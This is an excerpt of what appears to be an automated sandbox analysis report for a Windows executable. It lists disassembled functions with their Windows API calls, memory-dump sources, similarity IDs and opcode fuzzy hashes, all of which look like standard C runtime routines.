                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAC1B7
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAC1C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                            • Opcode ID: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
                                                                                                                                                            • Instruction ID: b0eec30fb4f519d56de71aaae0b5865839e8af686a8999c0cf4a1c3f1aac067c
                                                                                                                                                            • Opcode Fuzzy Hash: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
                                                                                                                                                            • Instruction Fuzzy Hash: 96118E60F0C24201FA59A326A941ABDA1725F54BB0F184337E87EC77C6DE2EE4659700
                                                                                                                                                            Function 00007FF6D6EABFD4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                            • Opcode ID: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
                                                                                                                                                            • Instruction ID: acfd8a31f09985b97e34a19ecda9c6dab747394abf28a897db40db869412c463
                                                                                                                                                            • Opcode Fuzzy Hash: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
                                                                                                                                                            • Instruction Fuzzy Hash: D6110990E0C20741FA6A67369891ABD51B24F45B74F28073BD87ECB2D3EE3FB4619610
                                                                                                                                                            Function 00007FF6D6EA69F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: verbose
                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                            • Opcode ID: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                                                                                                                            • Instruction ID: 704ad1f6e496a94bf7e5bf6b51d015f35a94b7674b90742414b9ca6657c354f3
                                                                                                                                                            • Opcode Fuzzy Hash: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                                                                                                                            • Instruction Fuzzy Hash: 6991EE32E4CA4681FB209E24D450B7D37B1EB42B94F448233EA5D8B3D9DE3EE8258340
                                                                                                                                                            Function 00007FF6D6EB0AA0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                            • Opcode ID: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                                                                                                                            • Instruction ID: df47637348c72274c94b20ede1262ab5cdf228e7a9b54ef1405decb0746ec01e
                                                                                                                                                            • Opcode Fuzzy Hash: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                                                                                                                            • Instruction Fuzzy Hash: EB817E32E0C74285FA769E2DD15027C3AA0AB11B88F558037CA0ADB695DF3FF9219B51
                                                                                                                                                            Function 00007FF6D6E9CF80 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                            • Opcode ID: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                                                                                                                            • Instruction ID: 32ae457adc35bb6c9eef4a654efb200a953e4c09a7c8472297b55bc36b2570be
                                                                                                                                                            • Opcode Fuzzy Hash: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                                                                                                                            • Instruction Fuzzy Hash: 3F519022F1DA128ADB14DF16E44467D6392EF45B9CF508133DA4A87788EF7EE869C700
                                                                                                                                                            Function 00007FF6D6E9F800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                            • Opcode ID: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                                                                                                                            • Instruction ID: cffff5f7b9c0935c1a9d395a3441baf09a046b8502ee22e6347dc4a3a4c21394
                                                                                                                                                            • Opcode Fuzzy Hash: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                                                                                                                            • Instruction Fuzzy Hash: 5C616E3290CB8582E7619F15E4403AEB7A0FB85B98F044227EB9D83B59DF7DD1A5CB00
                                                                                                                                                            Function 00007FF6D6E9FBB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                                                                                                                            • Instruction ID: 506d0bf530572fde98917ddec18e10ed48b3519e0b3efb42c57fa52aeaf3378c
                                                                                                                                                            • Opcode Fuzzy Hash: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                                                                                                                            • Instruction Fuzzy Hash: 29514932E0C68286EB648B25944436DB7A0AF55B9CF148137DE8D87BD5CF3DE4B18B05
                                                                                                                                                            Function 00007FF6D6E92870 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                            • API String ID: 1878133881-2410924014
                                                                                                                                                            • Opcode ID: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                                                                                                                            • Instruction ID: 83ee586107c6a8616789e74b047895c6c5fb83dacaaa1b1b819c25040e2bf870
                                                                                                                                                            • Opcode Fuzzy Hash: bd3b1ec170c9362c6821fd135409a0077202d763314442d1f4ebee1409f7e8bb
                                                                                                                                                            • Instruction Fuzzy Hash: C0315672A2C68181E620DB14E4516EE6364FF84BC8F804137E78D87A99DF3DD615CB40
                                                                                                                                                            Function 00007FF6D6E94340 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6D6E98DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98E1A
                                                                                                                                                            • CreateFileW.KERNEL32(00000000,?,?,00007FF6D6E93FB9,?,00007FF6D6E939CA), ref: 00007FF6D6E943A8
                                                                                                                                                            • GetFinalPathNameByHandleW.KERNEL32(?,?,00007FF6D6E93FB9,?,00007FF6D6E939CA), ref: 00007FF6D6E943C8
                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00007FF6D6E93FB9,?,00007FF6D6E939CA), ref: 00007FF6D6E943D3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Handle$ByteCharCloseCreateFileFinalMultiNamePathWide
                                                                                                                                                            • String ID: \\?\
                                                                                                                                                            • API String ID: 2226452419-4282027825
                                                                                                                                                            • Opcode ID: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                                                                                                                            • Instruction ID: fa55199dc07cb752c042f53665910cc129f0a426e2717cee560661c730da60c9
                                                                                                                                                            • Opcode Fuzzy Hash: 73aa29fffb20bf18054ec36f2ff632c499c886adceaf3567ccea49c9f56a016a
                                                                                                                                                            • Instruction Fuzzy Hash: 1621A272F1C65185EB209B25F8543AE6351AF88B98F440233DF4D83A94EF3ED969CB00
                                                                                                                                                            Function 00007FF6D6EAD350 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                            • Opcode ID: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                                                                                                                            • Instruction ID: eed6f7ab17a69488550bd32c158ca24868ba72ac8f20f4a7a43387829d3d321f
                                                                                                                                                            • Opcode Fuzzy Hash: f3307fa9b22cd1c245fea77c51432e5876b76cda8032067fabe2ab74fde9908f
                                                                                                                                                            • Instruction Fuzzy Hash: 98D1FF72F0CA8189E711CF69C4846EC37B5FB44B98B044236DE5E97B99DE39E42AC340
                                                                                                                                                            Function 00007FF6D6EA6044 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                            • Opcode ID: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                                                                                                                            • Instruction ID: 437e0589c950ca0a6cff6a9818abb7fe16c805beb34d744b3feb12fa35067270
                                                                                                                                                            • Opcode Fuzzy Hash: 96091dbd27bcc0a8deeeb26956a1675b21701702191f3790d8b7488761ccdccb
                                                                                                                                                            • Instruction Fuzzy Hash: 2A518D26E0C6418AFB10DFB0D8507BD3BB1AB59B58F108536DE0D8B68ADF39D5A98740
                                                                                                                                                            Function 00007FF6D6E92310 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                            • Opcode ID: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
                                                                                                                                                            • Instruction ID: bb1c4210cc2d2a9e87024529a3afef3aa33e19936c1d056c19d0cd68258ee093
                                                                                                                                                            • Opcode Fuzzy Hash: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
                                                                                                                                                            • Instruction Fuzzy Hash: CD11A921E2C24346FB54D779F54C2BD1251EF88BC4F848033DA4986B99CE2ED4E59600
                                                                                                                                                            Function 00007FF6D6E9C7A0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                            • Opcode ID: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                                                                                                                            • Instruction ID: 685b63908f5acec67ebe59c93b5151b19ac5410847dd88128ee37a53b9ca15b3
                                                                                                                                                            • Opcode Fuzzy Hash: 9121cd0992376079c28b7b15cfb2bb882a77f2b3c78bb4ce64e2c22522254d02
                                                                                                                                                            • Instruction Fuzzy Hash: EE111822F18F058AEB008F64E8552AC33A4FB19B58F441E32DE6D867A4EF78D564C340
                                                                                                                                                            Function 00007FF6D6EB6A6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                            • String ID: ?
                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                            • Opcode ID: 8b6f824ce68226522039b5681d667a4258c25c0b371a8f4ef00d3752ae492e10
                                                                                                                                                            • Instruction ID: 3450054e8289e33f7b8383730dbb5458860a2ee41ddb3e4e8d4ea075d8be0c15
                                                                                                                                                            • Opcode Fuzzy Hash: 8b6f824ce68226522039b5681d667a4258c25c0b371a8f4ef00d3752ae492e10
                                                                                                                                                            • Instruction Fuzzy Hash: 47410512E1C78246FB249B29A4457BE7760EB80BA4F144236EF5C86AD9DE3ED461CB00
                                                                                                                                                            Function 00007FF6D6EA9DC8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EA9DFA
                                                                                                                                                              • Part of subcall function 00007FF6D6EAB700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB716
                                                                                                                                                              • Part of subcall function 00007FF6D6EAB700: GetLastError.KERNEL32(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB720
                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6D6E9C335), ref: 00007FF6D6EA9E18
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
